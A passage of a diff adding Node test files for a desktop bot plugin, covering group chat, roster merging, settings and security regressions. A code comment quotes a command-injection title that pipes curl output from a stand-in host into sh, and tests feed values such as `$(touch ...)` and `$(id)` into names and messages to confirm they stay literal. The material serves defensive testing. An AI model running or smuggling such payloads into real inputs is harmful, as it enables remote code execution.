+  // Every member took exactly one turn (round 1), then the settle exit fired.
+  assert.equal(gc.calls.length, 3)
+})
+
+test('hard caps: chatty members stop at GROUP_CHAT_MAX_MESSAGES total', async () => {
+  const gc = load((profile, prompt, n) => `message ${n} — @everyone keep going`)
+
+  gc.sendToGroupChat('Loud', MEMBERS, 'go wild')
+  for (let i = 0; i < 400 && (gc.$groupChats.get().Loud || {}).running; i++) {
+    await new Promise(resolve => setImmediate(resolve))
+  }
+
+  const memberMessages = roomLog(gc, 'Loud').filter(e => e.from.kind === 'member')
+  assert.ok(memberMessages.length <= gc.GROUP_CHAT_MAX_MESSAGES, `posted ${memberMessages.length}`)
+})
+
+test('failed member turn is a pass, not a room error', async () => {
+  const gc = load(profile => {
+    if (profile === 'builder') {
+      throw new Error('gateway hiccup')
+    }
+    return '(pass)'
+  })
+
+  gc.sendToGroupChat('Flaky', MEMBERS, 'anyone around?')
+  for (let i = 0; i < 200 && (gc.$groupChats.get().Flaky || {}).running; i++) {
+    await new Promise(resolve => setImmediate(resolve))
+  }
+
+  const log = roomLog(gc, 'Flaky')
+  assert.equal(log.length, 1) // just the user message; no error entries
+})
+
+test('delta injection: a second user send only feeds members the NEW messages', async () => {
+  const prompts = []
+  const gc = load((profile, prompt) => {
+    prompts.push({ profile, prompt })
+    return '(pass)'
+  })
+
+  gc.sendToGroupChat('Delta', [{ name: 'research', title: '' }], 'first message')
+  for (let i = 0; i < 200 && (gc.$groupChats.get().Delta || {}).running; i++) {
+    await new Promise(resolve => setImmediate(resolve))
+  }
+  const firstCount = prompts.length
+  gc.sendToGroupChat('Delta', [{ name: 'research', title: '' }], 'second message')
+  for (let i = 0; i < 200 && (gc.$groupChats.get().Delta || {}).running; i++) {
+    await new Promise(resolve => setImmediate(resolve))
+  }
+
+  const second = prompts.slice(firstCount).find(p => p.prompt.includes('second message'))
+  assert.ok(second, 'second turn ran')
+  assert.equal(second.prompt.includes('first message'), false, 'first message was already seen — not re-injected')
+})
+
+test('needs-you: a member reply mentioning @user badges the group; user send clears it', async () => {
+  const gc = load(profile => (profile === 'research' ? 'Blocked on billing access — @user which account?' : '(pass)'))
+
+  gc.sendToGroupChat('Escalate', [{ name: 'research', title: '' }], 'sort out the invoices')
+  for (let i = 0; i < 200 && (gc.$groupChats.get().Escalate || {}).running; i++) {
+    await new Promise(resolve => setImmediate(resolve))
+  }
+  assert.equal(gc.$groupNeedsYou.get().Escalate, true)
+
+  const gc2 = gc // same room: user reply clears
+  gc2.sendToGroupChat('Escalate', [{ name: 'research', title: '' }], 'use the ops account')
+  assert.equal(gc2.$groupNeedsYou.get().Escalate, false)
+})
+
+test('turn transport is gateway-native (session RPCs) and hostile text rides verbatim', async () => {
+  const gc = load(() => '(pass)')
+
+  gc.sendToGroupChat('Rpc', [{ name: 'research', title: '' }], 'hello "there" `whoami` $(id)')
+  for (let i = 0; i < 200 && (gc.$groupChats.get().Rpc || {}).running; i++) {
+    await new Promise(resolve => setImmediate(resolve))
+  }
+
+  const call = gc.calls[0]
+  assert.equal(call.profile, 'research')
+  // Hostile text is a JSON string in an RPC param — never a shell string.
+  assert.equal(call.prompt.includes('hello "there" `whoami` $(id)'), true)
+  // The per-group session is created with the room title.
+  assert.match(pluginSource, /title,\n/)
+  assert.match(pluginSource, /const title = `Group: \$\{group\}`/)
+})
+
+test('log trimming keeps watermarks consistent', () => {
+  const gc = load(() => '(pass)')
+  const log = Array.from({ length: 200 }, (_, i) => ({ from: { kind: 'user', name: 'You' }, text: `m${i}`, at: i }))
+  const { log: trimmed, watermarks } = gc.trimGroupChatLog(log, { research: 150, builder: 10 }, 96)
+  assert.equal(trimmed.length, 96)
+  assert.equal(watermarks.research, 150 - 104)
+  assert.equal(watermarks.builder, 0)
+})
+
+test('source contract: workspace + header affordance + prompt rules are wired', () => {
+  assert.match(pluginSource, /function GroupChatWorkspace\(/)
+  assert.match(pluginSource, /Open chat/)
+  assert.match(pluginSource, /reply with exactly "\(pass\)"/i)
+  assert.match(pluginSource, /\[Group chat: "\$\{groupName\}"\]/)
+})

--- a/apps/desktop/src/plugins/hermes-bots/tests/hide-bot-chats.test.mjs
+++ b/apps/desktop/src/plugins/hermes-bots/tests/hide-bot-chats.test.mjs
@@ -1,0 +1,59 @@
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import test from 'node:test'
+import vm from 'node:vm'
+
+// #46: canonical "Bot Chat" sessions can be hidden from the global Sessions
+// sidebar via the core generic `hidden` session flag, while staying in the Bots
+// roster. The plugin passes hidden:true on session.create when the pref is on,
+// and setHideBotChats reconciles existing chats via session.set_hidden.
+
+const source = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8')
+
+function loadCreate(hidePref) {
+  const start = source.indexOf('const canonicalCreations = new Map()')
+  const end = source.indexOf('function displayName(', start)
+  const created = []
+  const context = {
+    host: {
+      openSession: async () => {},
+      request: async (method, params) => {
+        if (method === 'session.create') {
+          created.push(params)
+          return { stored_session_id: 'sid-1', session_id: 'rt-1' }
+        }
+        return {}
+      }
+    },
+    saveBotMeta: () => {},
+    $hideBotChats: { get: () => hidePref },
+    window: { setTimeout: cb => cb() }
+  }
+  const section = source.slice(start, end).concat('\nglobalThis.__c = { createCanonicalChat };\n')
+  vm.runInNewContext(section, context, { filename: 'c.js' })
+  return { create: context.__c.createCanonicalChat, created }
+}
+
+test('createCanonicalChat passes hidden:true when the pref is on', async () => {
+  const { create, created } = loadCreate(true)
+  await create('alpha')
+  assert.equal(created.length, 1)
+  assert.equal(created[0].hidden, true)
+  assert.equal(created[0].title, 'Bot Chat')
+})
+
+test('createCanonicalChat omits hidden when the pref is off', async () => {
+  const { create, created } = loadCreate(false)
+  await create('beta')
+  assert.equal(created.length, 1)
+  assert.ok(!('hidden' in created[0]), 'hidden should be omitted, not false')
+})
+
+test('setHideBotChats persists the pref and reconciles known chats via session.set_hidden', () => {
+  // Source-level: the toggle calls session.set_hidden for each known canonical
+  // chat id and persists the pref to storage.
+  const fn = source.slice(source.indexOf('async function setHideBotChats('), source.indexOf('const avatarFetchInflight'))
+  assert.match(fn, /storage\?\.set\?\.\('hide-bot-chats', hidden\)/)
+  assert.match(fn, /session\.set_hidden.*session_id: sid, hidden/)
+  assert.match(fn, /\.map\(m => m && m\.chat\)/)
+})

--- a/apps/desktop/src/plugins/hermes-bots/tests/hub-picker-guard.test.mjs
+++ b/apps/desktop/src/plugins/hermes-bots/tests/hub-picker-guard.test.mjs
@@ -1,0 +1,27 @@
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import test from 'node:test'
+
+// The Skills Hub picker embed posts {type:'hermes-skill-pick'} messages and
+// the plugin installs via skills.manage. The handler checked only
+// event.origin — any window on the hub origin (e.g. an OAuth popup returned
+// to the hub) could trigger an install while the picker is open, and any
+// string reached skills.manage as the install identifier. Picks are now
+// pinned to OUR iframe's contentWindow and the identifier is charset-checked.
+
+const source = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8')
+
+const start = source.indexOf('function HubSkillsSection(')
+assert.notEqual(start, -1, 'HubSkillsSection is missing')
+const section = source.slice(start, source.indexOf('function emptyAdvancedState', start))
+
+test('regression: hub pick messages are pinned to the embedded frame', () => {
+  assert.ok(section.includes('const frameRef = useRef(null)'))
+  assert.ok(section.includes('event.source !== frameRef.current.contentWindow'))
+  assert.ok(section.includes('ref: frameRef'))
+})
+
+test('regression: hub pick identifiers are charset-checked before install', () => {
+  assert.ok(section.includes("if (!/^[A-Za-z0-9][A-Za-z0-9._/-]*$/.test(target)) {"))
+  assert.ok(section.includes('const target = String(data.identifier || data.name)'))
+})

--- a/apps/desktop/src/plugins/hermes-bots/tests/legacy-sdk-compat.test.mjs
+++ b/apps/desktop/src/plugins/hermes-bots/tests/legacy-sdk-compat.test.mjs
@@ -1,0 +1,91 @@
+import assert from 'node:assert/strict'
+import { mkdirSync, mkdtempSync, readFileSync, rmSync, writeFileSync } from 'node:fs'
+import { tmpdir } from 'node:os'
+import { join } from 'node:path'
+import test from 'node:test'
+import { pathToFileURL } from 'node:url'
+
+const pluginSource = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8')
+const OPTIONAL_CAPABILITY_EXPORTS = new Set(['McpTab', 'ToolsetConfigPanel', 'SkillsView'])
+
+function sdkNamedImports(source) {
+  const match = source.match(/import\s+\{([\s\S]*?)\}\s+from '@hermes\/plugin-sdk'/)
+
+  assert.ok(match, 'plugin.js must retain the mandatory named SDK import')
+
+  return match[1]
+    .split(',')
+    .map(name => name.trim())
+    .filter(Boolean)
+    .map(name => name.split(/\s+as\s+/)[0])
+}
+
+function proxyModule(exportNames) {
+  const exports = exportNames.map(name => `  proxy as ${name}`).join(',\n')
+
+  return `const proxy = new Proxy(function () { return proxy }, {
+  apply: () => proxy,
+  get: (_target, key) => {
+    if (key === Symbol.iterator) return function * () {}
+    if (key === Symbol.toPrimitive) return () => 0
+    if (key === 'then') return undefined
+    return proxy
+  }
+})
+
+export {
+${exports}
+}
+`
+}
+
+function writeLegacySdk(root) {
+  const packageRoot = join(root, 'node_modules', '@hermes', 'plugin-sdk')
+  const exportNames = sdkNamedImports(pluginSource).filter(
+    name => !OPTIONAL_CAPABILITY_EXPORTS.has(name)
+  )
+
+  mkdirSync(packageRoot, { recursive: true })
+  writeFileSync(
+    join(packageRoot, 'package.json'),
+    `${JSON.stringify({ name: '@hermes/plugin-sdk', type: 'module', exports: './index.js' }, null, 2)}\n`
+  )
+  writeFileSync(join(packageRoot, 'index.js'), proxyModule(exportNames))
+}
+
+function writeReactStubs(root) {
+  const packageRoot = join(root, 'node_modules', 'react')
+
+  mkdirSync(packageRoot, { recursive: true })
+  writeFileSync(
+    join(packageRoot, 'package.json'),
+    `${JSON.stringify(
+      {
+        name: 'react',
+        type: 'module',
+        exports: { '.': './index.js', './jsx-runtime': './jsx-runtime.js' }
+      },
+      null,
+      2
+    )}\n`
+  )
+  writeFileSync(join(packageRoot, 'index.js'), proxyModule(['useEffect', 'useRef', 'useState']))
+  writeFileSync(join(packageRoot, 'jsx-runtime.js'), proxyModule(['jsx', 'jsxs']))
+}
+
+test('legacy SDK without optional capability exports still links Bot Mode', async t => {
+  const root = mkdtempSync(join(tmpdir(), 'hermes-bot-mode-legacy-sdk-'))
+  const pluginPath = join(root, 'plugin.js')
+
+  t.after(() => rmSync(root, { recursive: true, force: true }))
+
+  writeFileSync(join(root, 'package.json'), '{"type":"module"}\n')
+  writeFileSync(pluginPath, pluginSource)
+  writeLegacySdk(root)
+  writeReactStubs(root)
+
+  const loaded = await import(pathToFileURL(pluginPath).href)
+
+  assert.equal(loaded.default.id, 'hermes-bots')
+  assert.equal(typeof loaded.default.register, 'function')
+})

--- a/apps/desktop/src/plugins/hermes-bots/tests/mention-handoff-quoting.test.mjs
+++ b/apps/desktop/src/plugins/hermes-bots/tests/mention-handoff-quoting.test.mjs
@@ -1,0 +1,112 @@
+import assert from 'node:assert/strict'
+import { spawnSync } from 'node:child_process'
+import { existsSync, readFileSync, rmSync } from 'node:fs'
+import test from 'node:test'
+import vm from 'node:vm'
+
+// The @mention middleware appends a handoff note whose hermes command the
+// active agent runs verbatim in its terminal. The sender display name and
+// @handle used to be interpolated into the double-quoted -q argument (and
+// the recipient name sat unquoted after -p) with no escaping — a bot title
+// like `x" ; curl evil.sh | sh ; echo "` (titles are free text and sync from
+// ui_meta, i.e. other machines / the gateway) broke out into real commands,
+// and $(...) inside double quotes expanded even without a breakout. Same
+// class as the delegated-routine fix for #21.
+
+const pluginSource = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8')
+
+function load({ activeProfile = 'research', profiles = ['research', 'ops'], title = null } = {}) {
+  const values = new Map()
+  const atom = initial => {
+    const slot = { get: () => values.get(slot), set: value => values.set(slot, value) }
+    values.set(slot, initial)
+    return slot
+  }
+  const context = {
+    atom,
+    PALETTE_AREA: 'palette',
+    COMPOSER_AREAS: { middleware: 'middleware' },
+    document: { getElementById: () => null, createElement: () => ({}), head: { appendChild: () => undefined } },
+    host: {
+      request: async method => {
+        if (method === 'profiles.list') {
+          return { profiles: profiles.map(name => ({ name })) }
+        }
+        return {}
+      },
+      state: { profile: { get: () => activeProfile, listen: () => undefined }, gateway: { listen: () => undefined } }
+    }
+  }
+  const source = pluginSource
+    .replace(/^import\s+\*\s+as\s+sdk\s+from '@hermes\/plugin-sdk'\r?\n/m, '')
+    .replace(/^import\s+\{[\s\S]*?\}\s+from '@hermes\/plugin-sdk'\r?\n/m, '')
+    .replace(/^const \{ McpTab, ToolsetConfigPanel \} = sdk\r?\n/m, '')
+    .replace(/^import .* from 'react'\r?\n/m, '')
+    .replace(/^import .* from 'react\/jsx-runtime'\r?\n/m, '')
+    .replace('export default {', 'globalThis.plugin = {')
+    .concat('\nglobalThis.__mention = { $botMeta };\n')
+  vm.runInNewContext(source, context, { filename: 'plugin.js' })
+  context.__mention.$botMeta.set(title ? { [activeProfile]: { title } } : {})
+
+  const registered = []
+  context.plugin.register({ storage: { get: () => null }, register: entry => registered.push(entry) })
+  const middleware = registered.find(entry => entry.id === 'mention-middleware')
+  assert.ok(middleware, 'mention middleware did not register')
+  return { handler: middleware.data.handler }
+}
+
+/** Run the note's first hermes command under a stub that echoes each argv
+ *  element — proves the shell received the interpolations as LITERALS. */
+function runHandoffCommand(noteText) {
+  const command = noteText.match(/`hermes -p [^`]*`/)[0].slice(1, -1)
+  const script = `hermes() { printf '%s\\037' "$@"; }\n${command}`
+  const result = spawnSync('sh', ['-c', script], { encoding: 'utf8' })
+  assert.equal(result.status, 0, result.stderr)
+  return result.stdout.split('\x1f').slice(0, -1)
+}
+
+test('security: a poisoned bot title stays literal in the handoff command', async () => {
+  const quoteSentinel = `/tmp/hermes-bot-mode-mention-quote-${process.pid}`
+  const subSentinel = `/tmp/hermes-bot-mode-mention-sub-${process.pid}`
+  rmSync(quoteSentinel, { force: true })
+  rmSync(subSentinel, { force: true })
+
+  const title = `Evil" ; touch ${quoteSentinel} ; echo "$(touch ${subSentinel})"`
+  const { handler } = load({ title })
+
+  const result = await handler({ text: 'please @ops review the diff' })
+  assert.ok(result.text.includes('[@mention handoff'))
+
+  const args = runHandoffCommand(result.text)
+  assert.equal(args[args.indexOf('-p') + 1], 'ops')
+  assert.equal(
+    args[args.indexOf('-q') + 1],
+    `Message from \uD83E\uDD16 ${title} (@research): <your composed message>`
+  )
+  assert.equal(existsSync(quoteSentinel), false)
+  assert.equal(existsSync(subSentinel), false)
+})
+
+test('security: a hostile active profile name stays literal in the handoff command', async () => {
+  const sentinel = `/tmp/hbmmention${process.pid}`
+  rmSync(sentinel, { force: true })
+  const activeProfile = `res$(touch ${sentinel})earch`
+
+  const { handler } = load({ activeProfile, title: null })
+  const result = await handler({ text: 'ask @ops to summarize' })
+
+  const args = runHandoffCommand(result.text)
+  // displayName title-cases word boundaries inside the name — the shell
+  // metacharacters survive that transform, so they must arrive escaped.
+  assert.equal(
+    args[args.indexOf('-q') + 1],
+    `Message from \uD83E\uDD16 Res$(Touch /Tmp/Hbmmention${process.pid})Earch (@${activeProfile}): <your composed message>`
+  )
+  assert.equal(existsSync(sentinel), false)
+})
+
+test('regression: the handoff command quotes the recipient argument', async () => {
+  const { handler } = load()
+  const result = await handler({ text: 'ping @ops please' })
+  assert.match(result.text, /`hermes -p 'ops' chat --in ~/)
+})

--- a/apps/desktop/src/plugins/hermes-bots/tests/model-inherit.test.mjs
+++ b/apps/desktop/src/plugins/hermes-bots/tests/model-inherit.test.mjs
@@ -1,0 +1,95 @@
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import test from 'node:test'
+import vm from 'node:vm'
+
+const source = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8')
+
+function loadApplyAdvancedConfig(request) {
+  const start = source.indexOf('async function applyAdvancedConfig(')
+  const end = source.indexOf('// ── edit profile dialog', start)
+  const context = {
+    host: { request },
+    ensureMessagingProtocol: soul => soul,
+    $lastRoster: { get: () => [] }
+  }
+  const section = source
+    .slice(start, end)
+    .concat('\nglobalThis.__advanced = { applyAdvancedConfig };\n')
+
+  assert.notEqual(start, -1, 'applyAdvancedConfig is missing')
+  assert.notEqual(end, -1, 'advanced-config section delimiter is missing')
+  vm.runInNewContext(section, context, { filename: 'advanced-config.js' })
+  return context.__advanced.applyAdvancedConfig
+}
+
+function state(patch = {}) {
+  return {
+    provider: '',
+    model: '',
+    soul: '',
+    skills: [],
+    toolsets: [],
+    dirtyModel: false,
+    dirtySoul: false,
+    dirtySkills: false,
+    dirtyToolsets: false,
+    ...patch
+  }
+}
+
+test('regression: selecting Inherit explicitly clears the profile model assignment', async () => {
+  const calls = []
+  const apply = loadApplyAdvancedConfig(async (method, params) => {
+    calls.push({ method, params })
+    return { code: 0, blocked: false, output: 'Unset model' }
+  })
+
+  const result = await apply('ops', state({ dirtyModel: true }))
+
+  assert.deepEqual(JSON.parse(JSON.stringify(calls)), [
+    {
+      method: 'cli.exec',
+      params: { argv: ['--profile', 'ops', 'config', 'unset', 'model'] }
+    }
+  ])
+  assert.deepEqual(JSON.parse(JSON.stringify(result)), { ok: true, applied: { model: true } })
+})
+
+test('integration: model clearing and other dirty sections report a merged result', async () => {
+  const calls = []
+  const apply = loadApplyAdvancedConfig(async (method, params) => {
+    calls.push({ method, params })
+    if (method === 'cli.exec') return { code: 0, blocked: false, output: 'Unset model' }
+    return { ok: true, applied: { soul: true } }
+  })
+
+  const result = await apply('ops', state({ dirtyModel: true, dirtySoul: true, soul: '# Ops' }))
+
+  assert.equal(calls[0].method, 'cli.exec')
+  assert.deepEqual(JSON.parse(JSON.stringify(calls[1])), {
+    method: 'profiles.configure',
+    params: { name: 'ops', soul: '# Ops' }
+  })
+  assert.deepEqual(JSON.parse(JSON.stringify(result)), {
+    ok: true,
+    applied: { model: true, soul: true }
+  })
+})
+
+test('regression: a rejected model clear is reported as a failed section', async () => {
+  const apply = loadApplyAdvancedConfig(async () => ({ code: 1, blocked: false, output: 'Config key not set' }))
+
+  const result = await apply('ops', state({ dirtyModel: true }))
+
+  assert.deepEqual(JSON.parse(JSON.stringify(result)), { ok: false, applied: { model: false } })
+})
+
+test('regression: an advanced-section failure suppresses the contradictory success toast', () => {
+  const start = source.indexOf('function EditProfileDialog(')
+  const end = source.indexOf('function CreateAgentDialog(', start)
+  const dialog = source.slice(start, end)
+
+  assert.match(dialog, /let advancedFailed = false/)
+  assert.match(dialog, /if \(!advancedFailed && !lookFailed\) \{\s*host\.notify\(\{ kind: 'success'/)
+})

--- a/apps/desktop/src/plugins/hermes-bots/tests/multi-source-roster.test.mjs
+++ b/apps/desktop/src/plugins/hermes-bots/tests/multi-source-roster.test.mjs
@@ -1,0 +1,128 @@
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import test from 'node:test'
+import vm from 'node:vm'
+
+const source = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8')
+
+function runtime() {
+  const atom = value => ({ get: () => value, set: () => undefined })
+  const jsx = (type, props = {}) => ({ type, props })
+  const context = {
+    atom,
+    jsx,
+    jsxs: jsx,
+    useQuery: () => ({}),
+    useValue: value => (value?.get ? value.get() : value),
+    useState: value => [value, () => undefined],
+    document: { getElementById: () => null, createElement: () => ({}), head: { appendChild: () => undefined } },
+    host: { state: { profile: { get: () => 'ops', listen: () => undefined } }, request: () => undefined },
+    sdk: new Proxy({}, { get: () => undefined })
+  }
+  const code = source
+    .replace(/^import \* as sdk from '@hermes\/plugin-sdk'\r?\n/m, '')
+    .replace(/^import\s+\{[\s\S]*?\}\s+from '@hermes\/plugin-sdk'\r?\n/m, '')
+    .replace(/^import .* from 'react'\r?\n/m, '')
+    .replace(/^import .* from 'react\/jsx-runtime'\r?\n/m, '')
+    .replace('export default {', 'globalThis.plugin = {')
+    .concat(
+      '\nglobalThis.__mergeMultiSourceRoster = mergeMultiSourceRoster;\nglobalThis.__botHandle = botHandle;\nglobalThis.__filterBots = filterBots;'
+    )
+  vm.runInNewContext(code, context)
+  return context
+}
+
+test('merge: no union → local list untouched', () => {
+  const { __mergeMultiSourceRoster: merge } = runtime()
+  const local = { profiles: [{ name: 'default', last_session: { id: 's1' } }] }
+
+  const out = merge(local, { agents: [] })
+  assert.equal(out.profiles.length, 1)
+  assert.equal(out.profiles[0].name, 'default')
+  assert.equal(out.profiles[0].last_session.id, 's1')
+})
+
+test('merge: local rows are annotated, remote rows appended with source tags', () => {
+  const { __mergeMultiSourceRoster: merge } = runtime()
+  const local = { profiles: [{ name: 'research', last_session: { id: 's1' } }] }
+  const union = {
+    agents: [
+      {
+        connectionId: 'local',
+        connectionKind: 'local',
+        connectionLabel: 'This device',
+        profile: 'research',
+        handle: 'research-this-device'
+      },
+      {
+        connectionId: 'homelab',
+        connectionKind: 'remote',
+        connectionLabel: 'Homelab',
+        profile: 'research',
+        handle: 'research-homelab'
+      },
+      { connectionId: 'homelab', connectionKind: 'remote', connectionLabel: 'Homelab', profile: 'coder', handle: 'coder' }
+    ]
+  }
+
+  const out = merge(local, union)
+  assert.equal(out.profiles.length, 3)
+
+  const localRow = out.profiles.find(p => p.name === 'research' && !p.remoteSource)
+  // Annotated in place — rich fields survive, handle attached.
+  assert.equal(localRow.last_session.id, 's1')
+  assert.equal(localRow.handle, 'research-this-device')
+  assert.equal(localRow.remoteSource, undefined)
+
+  const remoteRow = out.profiles.find(p => p.name === 'research' && p.remoteSource)
+  assert.equal(remoteRow.handle, 'research-homelab')
+  assert.equal(remoteRow.connectionId, 'homelab')
+  assert.equal(remoteRow.connectionLabel, 'Homelab')
+
+  const coder = out.profiles.find(p => p.name === 'coder')
+  assert.equal(coder.remoteSource, true)
+  assert.equal(coder.handle, 'coder')
+})
+
+test('merge: union-only local profiles are NOT invented as thin rows', () => {
+  const { __mergeMultiSourceRoster: merge } = runtime()
+  const local = { profiles: [{ name: 'default' }] }
+  const union = {
+    agents: [
+      { connectionId: 'local', connectionKind: 'local', connectionLabel: 'This device', profile: 'ghost', handle: 'ghost' }
+    ]
+  }
+
+  const out = merge(local, union)
+  assert.equal(out.profiles.length, 1)
+  assert.equal(out.profiles[0].name, 'default')
+})
+
+test('botHandle: precomputed multi-source handle wins; default stays hermes', () => {
+  const { __botHandle: botHandle } = runtime()
+
+  assert.equal(botHandle('research', { handle: 'research-homelab' }), 'research-homelab')
+  assert.equal(botHandle('research', { handle: 'research' }), 'research')
+  assert.equal(botHandle('research'), 'research')
+  assert.equal(botHandle('default'), 'hermes')
+})
+
+test('filterBots: matches the source device name for remote rows', () => {
+  const { __filterBots: filterBots } = runtime()
+  const roster = [
+    { name: 'research' },
+    { name: 'research', remoteSource: true, connectionLabel: 'Homelab', handle: 'research-homelab' }
+  ]
+
+  const hits = filterBots(roster, {}, 'homelab')
+  assert.equal(hits.length, 1)
+  assert.equal(hits[0].remoteSource, true)
+
+  // Handle search still narrows to the disambiguated row.
+  const byHandle = filterBots(roster, {}, '@research-homelab')
+  assert.equal(byHandle.length, 1)
+  assert.equal(byHandle[0].handle, 'research-homelab')
+
+  // Bare profile search keeps matching both rows.
+  assert.equal(filterBots(roster, {}, 'research').length, 2)
+})

--- a/apps/desktop/src/plugins/hermes-bots/tests/new-compact-guard.test.mjs
+++ b/apps/desktop/src/plugins/hermes-bots/tests/new-compact-guard.test.mjs
@@ -1,0 +1,27 @@
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import test from 'node:test'
+
+// The /new -> /compact guard protects a bot's canonical forever-chat from being
+// forked by /new. It compares the current session id against the bot's stored
+// canonical id. That id is persisted as meta.chat everywhere (createCanonicalChat
+// saveBotMeta(name,{chat:sid}), openBotCanonicalChat, BotRow). A regression read
+// it as meta.chat_pin — a key that is never written — so pinnedId was always null
+// and the guard never fired: /new silently forked the forever-chat.
+
+const source = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8')
+
+// Locate the /new reroute guard block.
+const guardStart = source.indexOf('const slashNew =')
+assert.notEqual(guardStart, -1, '/new guard block is missing')
+const guardBlock = source.slice(guardStart, guardStart + 600)
+
+test('regression: /new guard reads the canonical id from meta.chat, not meta.chat_pin', () => {
+  assert.match(guardBlock, /const pinnedId = meta\?\.chat \|\| null/)
+  assert.doesNotMatch(guardBlock, /chat_pin/)
+})
+
+test('regression: canonical id is persisted as meta.chat (the key the guard reads)', () => {
+  // The writer and the guard must agree on the key, or the guard never fires.
+  assert.match(source, /saveBotMeta\([^)]*\{\s*chat:\s*sid\s*\}/)
+})

--- a/apps/desktop/src/plugins/hermes-bots/tests/pet-fetch.test.mjs
+++ b/apps/desktop/src/plugins/hermes-bots/tests/pet-fetch.test.mjs
@@ -1,0 +1,76 @@
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import test from 'node:test'
+import vm from 'node:vm'
+
+const pluginSource = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8')
+
+function load(fetchImpl) {
+  const values = new Map()
+  const atom = initial => {
+    const slot = { get: () => values.get(slot), set: value => values.set(slot, value) }
+    values.set(slot, initial)
+    return slot
+  }
+  const fetches = []
+  const context = {
+    atom,
+    PALETTE_AREA: 'palette',
+    COMPOSER_AREAS: { middleware: 'middleware' },
+    document: {
+      getElementById: () => null,
+      createElement: () => ({
+        width: 0,
+        height: 0,
+        getContext: () => ({ drawImage() {} }),
+        toDataURL: () => 'data:image/png;base64,ok'
+      }),
+      head: { appendChild: () => undefined }
+    },
+    host: { state: { profile: { listen: () => undefined } } },
+    fetch: async (url, opts) => {
+      fetches.push({ url, opts })
+      return fetchImpl(url, opts)
+    },
+    AbortSignal,
+    createImageBitmap: async () => ({ close() {} })
+  }
+  const source = pluginSource
+    .replace(/^import\s+\*\s+as\s+sdk\s+from '@hermes\/plugin-sdk'\r?\n/m, '')
+    .replace(/^import\s+\{[\s\S]*?\}\s+from '@hermes\/plugin-sdk'\r?\n/m, '')
+    .replace(/^const \{ McpTab, ToolsetConfigPanel \} = sdk\r?\n/m, '')
+    .replace(/^import .* from 'react'\r?\n/m, '')
+    .replace(/^import .* from 'react\/jsx-runtime'\r?\n/m, '')
+    .replace('export default {', 'globalThis.plugin = {')
+    .concat('\nglobalThis.__api = { petFrameIcon };\n')
+  vm.runInNewContext(source, context, { filename: 'plugin.js' })
+  return { context, fetches }
+}
+
+test('unit: a failed pet fetch is not stuck in the cache', async () => {
+  let n = 0
+  const { context, fetches } = load(async () => {
+    n += 1
+    throw new Error('network')
+  })
+  const a = await context.__api.petFrameIcon('https://pets.example/a.webp')
+  const b = await context.__api.petFrameIcon('https://pets.example/a.webp')
+  assert.equal(a, null)
+  assert.equal(b, null)
+  assert.equal(fetches.length, 2)
+  assert.equal(n, 2)
+  assert.ok(fetches[0].opts.signal, 'fetch is aborted if it hangs')
+})
+
+test('regression: a successful icon is still cached', async () => {
+  let n = 0
+  const { context } = load(async () => {
+    n += 1
+    return { blob: async () => new Blob() }
+  })
+  const a = await context.__api.petFrameIcon('https://pets.example/ok.webp')
+  const b = await context.__api.petFrameIcon('https://pets.example/ok.webp')
+  assert.equal(a, 'data:image/png;base64,ok')
+  assert.equal(n, 1)
+  assert.equal(a, b)
+})

--- a/apps/desktop/src/plugins/hermes-bots/tests/profile-prewarm.test.mjs
+++ b/apps/desktop/src/plugins/hermes-bots/tests/profile-prewarm.test.mjs
@@ -1,0 +1,92 @@
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import test from 'node:test'
+import vm from 'node:vm'
+
+const source = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8')
+
+function sourceBetween(start, end) {
+  const from = source.indexOf(start)
+  const to = source.indexOf(end, from)
+
+  assert.notEqual(from, -1, `missing ${start}`)
+  assert.notEqual(to, -1, `missing ${end}`)
+
+  return source.slice(from, to)
+}
+
+function renderBotRow(name = 'alpha') {
+  const botRowSource = sourceBetween('function BotRow(', '// ── model picker')
+  const warmed = []
+  const atom = value => ({
+    get: () => value,
+    set: next => {
+      value = next
+    }
+  })
+  const node = (type, props = {}) => ({ type, props })
+  const context = {
+    BotFace: 'BotFace',
+    ContextMenu: 'ContextMenu',
+    ContextMenuContent: 'ContextMenuContent',
+    ContextMenuItem: 'ContextMenuItem',
+    ContextMenuSeparator: 'ContextMenuSeparator',
+    ContextMenuTrigger: 'ContextMenuTrigger',
+    ROSTER_KEY: ['hermes-bots', 'roster'],
+    $botMeta: atom({}),
+    $botUnread: atom({}),
+    $lastRoster: atom([]),
+    $selectedBot: atom('default'),
+    botAppearance: () => ({ shape: 'round', color: '#000', image: null }),
+    botHandle: value => value,
+    cn: (...values) => values.filter(Boolean).join(' '),
+    createCanonicalChat: async () => null,
+    displayName: bot => bot.name,
+    duplicateBot: async () => `${name}-copy`,
+    haptic: () => undefined,
+    // #49 session-aware-row helpers referenced inside BotRow.
+    previewKind: () => ({ fromBot: false, sender: null }),
+    generatedSessionTitle: () => null,
+    ACTIVE_WINDOW_S: 90,
+    A2A_PREFIX_RE: /^$/,
+    useEffect: () => undefined,
+    useState: initial => [typeof initial === 'function' ? initial() : initial, () => undefined],
+    host: {
+      state: { gateway: atom('open'), profile: atom('default') },
+      warmProfile: profile => warmed.push(profile),
+      request: async () => ({ sessions: [] }),
+      notify: () => undefined,
+      notifyError: () => undefined
+    },
+    jsx: node,
+    jsxs: node,
+    onEdit: () => undefined,
+    queryClient: { invalidateQueries: () => undefined },
+    relativeTime: () => 'now',
+    saveBotMeta: () => undefined,
+    showsHandle: () => false,
+    useValue: store => store.get()
+  }
+
+  vm.runInNewContext(`${botRowSource}\nglobalThis.BotRow = BotRow`, context)
+
+  const tree = context.BotRow({ bot: { name }, onEdit: context.onEdit })
+  const row = tree.props.children[0].props.children
+
+  return { row, warmed }
+}
+
